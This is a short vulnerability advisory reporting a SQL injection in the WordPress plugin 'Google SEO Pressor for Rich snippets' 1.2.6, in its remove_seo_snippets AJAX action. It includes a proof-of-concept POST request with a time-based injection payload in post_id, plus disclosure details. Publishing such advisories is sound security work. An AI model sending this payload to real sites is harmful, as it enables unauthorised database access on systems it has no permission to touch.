Google SEO Pressor for Rich snippets [SQL Injection]
Description
Google SEO Pressor for Rich snippets registers the AJAX
remove_seo_snippets with the purpose to provide a convenient way to
post authors to remove all post snippets. This action in turn call the
remove_snippets() which lacks capabilities checks and input
sanitization.
Vulnerable param is $_POST['post_id'].
This is a privileged action so it requires a registered user (no specific capabilities are required though)
PoC
POST /wp-admin/admin-ajax.php HTTP/1.1
Cookie: [COOKIES]
action=remove_seo_snippets
&post_id=1 and sleep(5)
INFO
- 25 April 2016
- Pan Vag
- www.smackcoders.com
- Google SEO Pressor for Rich snippets
- 1.2.6
- WordPress 4.5
- DWF-2016-87026